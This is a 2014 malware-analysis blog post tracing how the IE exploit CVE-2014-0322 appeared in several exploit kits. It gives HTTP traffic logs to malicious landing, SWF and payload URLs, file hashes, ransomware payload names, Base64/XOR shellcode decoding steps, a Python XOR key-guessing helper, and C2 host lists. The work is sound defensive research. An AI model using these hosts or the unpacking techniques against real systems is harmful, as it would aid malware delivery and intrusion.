2014-03-24 - Exploit Integration

CVE-2014-0322 integrating Exploit Kits

It took more time than I thought, but here we are: CVE-2014-0322 is now in Exploit Kits. It seems to have appeared first in Infinity and Fiesta.

Infinity EK:

Thanks Timo Hirvonen for fixing my ugly approach to that one.

Successful pass on Win7 with Flash, before KB2925418 (unpatched).

GET http://saarbangers-metal-festival .de/201403/br/573133020.htm
200 OK (text/html) 

Piece of Encoded CVE-2014-0322 and call for helper

CVE-2014-0322 after deobfuscation

GET http://saarbangers-metal-festival .de/swf.swf
200 OK (application/x-shockwave-flash) e8693573caecf1cab91aa578e1d62ab0 SWF Helper

GET http://saarbangers-metal-festival .de/6084.swf
200 OK (application/x-shockwave-flash) CVE-2013-0634

GET http://saarbangers-metal-festival .de/6084.swf
200 OK (application/x-shockwave-flash)

GET http://saarbangers-metal-festival .de/9073.mp3?rnd=75091
200 OK (application/x-msdownload)

GET http://saarbangers-metal-festival .de/9073.mp3?rnd=60183
200 OK (application/x-msdownload)

Files: 2 Fiddler captures (OwnCloud)
You'll also find a pcap on the nice Malware-Traffic-Analysis.

Fiesta:

2014-03-25 - Thanks EKWatcher for Referer.
Fiesta: Successful pass on Win7 IE10 with Flash, before KB2925418 (unpatched)

GET http://bgpjterlrw.no-ip .info/mycxql2/counter.php?id=2
301 Redirect to http://bgpjterlrw.no-ip.info/mycxql2/?2

GET http://bgpjterlrw.no-ip .info/mycxql2/?2
200 OK (text/html) http://pastebin.com/mxWFtG83

GET http://bgpjterlrw.no-ip .info/mycxql2/?1723d0e41c0f5f6458545f08560b54050501050b5f0407040a0201005509060705
200 OK (text/html) http://pastebin.com/znN5J1nU <- CVE-2014-0322 

Partial Decoding of the components to exploit CVE-2014-0322

"Ladyr" : Once Deobfuscated : http://pastebin.com/qVafD361
"Felt" Shellcode : http://pastebin.com/w22nNLg8

Following EKWatcher's guidelines:
Base64-decode the "Felt" parameter

Piece of the Base64-decoded "Felt" parameter
Open the output in a disassembler:

in diStorm

or send the output to an online disassembler (thanks Ben Layer)

B64 decoded shellcode in online disassembler
Once you figure out that it is XORed with 0x20, you can see, for instance, the payload URL:

XOR 0x20 on the Base64-decoded "Felt" parameter

GET http://bgpjterlrw.no-ip .info/mycxql2/?533de2b2f35a74c55c50555f570953030105045c5e0600020e060057540b010102
200 OK (application/x-shockwave-flash)  881a4d9fd2902e0af4e4a06bbc6ba63a <- Flash Helper

GET http://bgpjterlrw.no-ip .info/mycxql2/?1f210081f3d41f5b5216590a020b0900055005090b045a010a53010201095b0206;7
200 OK (application/octet-stream) - 98f29794b29c7a90cfc6af778a3d503c Redyms/Ramdo

Files: Fiddler

FlashPack:

Successful CVE-2014-0322 pass in FlashPack: 2014-03-27

GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/allow.php
200 OK (text/html)

GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/js/pd.php?id=68656c6c6f303332322e636f6d
200 OK (text/html)

POST http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/get_json.php
200 OK (text/html)

GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/msie.php
200 OK (text/html) <-- CVE-2013-2551

GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/link2jpg/index.php
200 OK (text/html)

Once decoded:

Code targeting CVE-2014-0322 in FlashPack
GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/link2jpg/e56d2.swf
200 OK (application/x-shockwave-flash) Flash Helper: f9e1338083a03d1b965ce8502c109372

GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/link2jpg/Erido.jpg
200 OK (image/jpeg)

Same file name and XOR key (95) as when this 0day was first spotted live.
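The two decoding steps described in this post (the Fiesta "Felt" parameter, Base64 then XOR 0x20, and the FlashPack Erido.jpg, XOR 95) are the same single-byte XOR trick, so here is an added helper, not code from the post or from any kit, that reproduces the procedure and also brute-forces the key when it is unknown by looking for a URL or a PE "MZ" header. The two blobs it decodes are constructed stand-ins (the domain and bytes are made up), not the real samples.

```python
import base64
import re

# Constructed stand-ins for the two blobs the post decodes: a Fiesta "Felt"-style
# shellcode (XORed with 0x20, then base64-encoded) and a FlashPack "Erido.jpg"-style
# payload (a PE image XORed with key 95). Neither is a real sample.
FELT_PLAIN = b"\x90\x90\x90\xe8\x00\x00\x00\x00http://payload.example.invalid/mycxql2/?7\x00"
FELT_B64 = base64.b64encode(bytes(b ^ 0x20 for b in FELT_PLAIN)).decode()
ERIDO_PLAIN = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
ERIDO_BLOB = bytes(b ^ 95 for b in ERIDO_PLAIN)

URL_RE = re.compile(rb"https?://[\x21-\x7e]{4,}")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one single-byte key (the scheme both kits use here)."""
    return bytes(b ^ key for b in data)


def decode_felt(b64_text: str, key: int = 0x20) -> bytes:
    """The post's procedure: base64-decode the "Felt" parameter, then XOR with 0x20."""
    return xor_bytes(base64.b64decode(b64_text), key)


def find_urls(data: bytes) -> list[str]:
    """Pull printable http(s) URLs (e.g. the payload URL) out of decoded shellcode."""
    return [m.group(0).decode("ascii") for m in URL_RE.finditer(data)]


def guess_xor_key(data: bytes) -> dict[int, list[str]]:
    """When the key is unknown, try all 256 single-byte keys and keep those that
    reveal a PE 'MZ' header at offset 0 or an embedded URL, with the reason."""
    candidates: dict[int, list[str]] = {}
    for key in range(256):
        out = xor_bytes(data, key)
        reasons = []
        if out[:2] == b"MZ":
            reasons.append("MZ header")
        if URL_RE.search(out):
            reasons.append("url")
        if reasons:
            candidates[key] = reasons
    return candidates


if __name__ == "__main__":
    print(find_urls(decode_felt(FELT_B64)))   # payload URL hidden in "Felt"
    print(guess_xor_key(ERIDO_BLOB))          # {95: ['MZ header']}
```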

Erido.jpg after the XOR 95 pass.
It also splits into two files with the same name:

Dropped in %temp%\low
c139ca52a05605926087a86a44c9f860 contacting:

kilensis.com /terkas/audio/loadmsie10.php | | IPSYSTEMS | UA | IPSYSTEMS.COM.UA | TK IPSYSTEMS LTD.

and here is the second file:

Files: Fiddler and samples (OwnCloud)
<post publication edit>You'll also find a pcap and samples by malware-traffic</edit>

Angler EK:

Successful pass for CVE-2014-0322 in Angler EK
GET http://callositfrenavisseque.teampac12 .com/s0dd2c8vc3
200 OK (text/html)

Piece of the code targeting CVE-2014-0322 in Angler EK 2014-03-28
Once decoded:

Why waste time renaming functions?

GET http://callositfrenavisseque.teampac12 .com/2ZhNTwSvCb7q0rUMk1eeQBch4k8SW3YuQb72x92634nu21RH
200 OK (text/html) 7aeefe2f40d607df2c51b89f912d9b37

GET http://callositfrenavisseque.teampac12 .com/QNZhV37gKdfsOwXFL86KIlYIKGhDK4PXmb55GtwVhjzPf-HP
200 OK (application/octet-stream)  0d62ee4c2fe169a65cd2d9afde80b6bc (Reveton Ransomware)

Files: Landing, SWF, Encoded and Decoded Payload (see here for decoding)

Sweet Orange:

Successful CVE-2014-0322 pass in Sweet Orange
GET http://bkse .pw/LiveUser_Admin/crypto.php?category=256
200 OK (text/html) http://pastebin.com/pPGJwa5f

CVE-2014-0322 in the Sweet Orange landing after some string replaces and a Base64 decode

GET http://bkse .pw/LiveUser_Admin/kaztPkw
200 OK (application/x-shockwave-flash) bef27f41b067d6f842c471562f78735b SWF Helper

GET http://duckfood .pw/customer.php?press=589&support=4&index=457&technical=171&game=555&polls=265&intm=447&flash=726&trans=335
200 OK (application/octet-stream)  b87500d8d40ec1ac249f44c29a71f07f (Target Japan)

Files: Fiddler/Sample

HiMan:
Edit: 2014-04-17 - Thanks Eoin Miller for hints on finding it.

CVE-2014-0322 pass in HiMan 2014-04-16

GET http://alertsecurity3-0004 .pw/fulypixojn.php
200 OK (text/html)

GET http://alertsecurity3-0004 .pw/kydopocfevokoxoqq/at.php?hg=687474703a2f2f616c6572747365637572697479332d303030342e70772f6b79646f706f636665766f6b6f786f71712f747572662e7068703f6e3d3730366337353637
200 OK (text/html) CVE-2014-0322 http://pastebin.com/uaWHZNwe

Piece of CVE-2014-0322 in HiMan after deobfuscation 2014-04-16

GET http://alertsecurity3-0004 .pw/kydopocfevokoxoqq/rues3.swf
200 OK (application/x-shockwave-flash) Flash Helper d67a83c6b3062cc5b451da2bd7c97499

GET http://alertsecurity3-0004 .pw/kydopocfevokoxoqq/turf2.php
200 OK (application/octet-stream) Payload seems to be a test file.

GET http://alertsecurity3-0004 .pw/kydopocfevokoxoqq/att.php?hg=687474703a2f2f616c6572747365637572697479332d303030342e70772f6b79646f706f636665766f6b6f786f71712f747572662e7068703f6e3d3730366337353637
200 OK (text/html) CVE-2013-2551 attempt

GET http://alertsecurity3-0004 .pw/kydopocfevokoxoqq/cw.php?rbbr=687474703a2f2f616c6572747365637572697479332d303030342e70772f6b79646f706f636665766f6b6f786f71712f747572662e7068703f6e3d3730366337353637
200 OK (text/html) Call for Flash CVE

GET http://alertsecurity3-0004 .pw/kydopocfevokoxoqq/nn.php?nh=687474703a2f2f616c6572747365637572697479332d303030342e70772f6b79646f706f636665766f6b6f786f71712f747572662e7068703f6e3d3730366337353637
200 OK (text/html) Call for Silverlight CVE

GET http://alertsecurity3-0004 .pw/kydopocfevokoxoqq/uf.jar
200 OK (application/java-archive)

Files: 2 Fiddler captures (not the CVE-2014-0322 pass, but containing the real payload, an Urausy-like ransomware)

Note: I know it's in Styx <- Wrong.
(See this: http://pastebin.com/Ya8kZihy) <edit 2014-04-10>Got them. The vuln is not there. It was maybe a test or something.</edit>
This is the Styx from the guys who were pushing Kovter and Zaccess in Sakura until December 2013 and who then switched to Styx. But I do not have the referer. Would love feedback on this.

Last known (to me) position:

2014/02/16 12:3x;goo6.payingmails.ostrowwlkp.pl;80;
2014/02/16 12:3x;mami1.payingmails.ostrowwlkp.pl;80;
2014/02/16 13:3x;alfad.magsforeveryone.ostrowwlkp.pl;80;
2014/02/16 13:3x;kinov.magsforeveryone.ostrowwlkp.pl;80;
2014/02/16 13:4x;wmczo.iaozu.ostrowwlkp.pl;80;
2014/02/16 13:4x;shiyu.iaozu.ostrowwlkp.pl;80;
2014/02/16 13:5x;opera.iaozu.ostrowwlkp.pl;80;
2014/02/16 16:1x;talen.cncnc.ostrowwlkp.pl;80;
2014/02/16 16:1x;asla.cncnc.ostrowwlkp.pl;80;

<edit 2014-04-10>
For those interested they are now here :
2014/04/10 xx:xx:xx;vivas.etudiants.ostrowiec.pl;80;
2014/04/10 xx:xx:xx;tv24.etudiants.ostrowiec.pl;80;
2014/04/10 xx:xx:xx;auror.elcuara.ostrowiec.pl;80;
2014/04/10 xx:xx:xx;thete.elcuara.ostrowiec.pl;80;

Read More:

CVE-2014-0322 Goon Infinity Redkit v2 Fiesta Sweet Orange